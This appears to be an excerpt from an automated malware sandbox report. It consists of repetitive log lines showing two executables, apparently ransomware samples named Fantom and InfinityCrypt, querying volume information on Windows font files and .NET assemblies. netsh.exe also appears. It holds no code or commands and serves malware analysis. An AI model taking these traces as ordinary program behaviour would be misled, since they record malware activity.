        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
        Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
